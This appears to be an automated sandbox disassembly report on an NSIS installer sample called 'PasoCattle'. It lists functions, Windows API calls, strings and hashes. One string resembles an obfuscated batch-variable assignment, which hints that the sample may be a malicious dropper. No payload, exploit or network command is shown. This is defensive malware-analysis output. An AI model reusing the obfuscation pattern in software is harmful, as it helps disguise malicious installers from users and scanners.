Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user retry, xrefs: 00401B40
File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Null, xrefs: 004036AA
soft, xrefs: 004036A1
Inst, xrefs: 00403698
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
API String ID: 651206458-1427982325
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

open, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
open, xrefs: 00402770

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
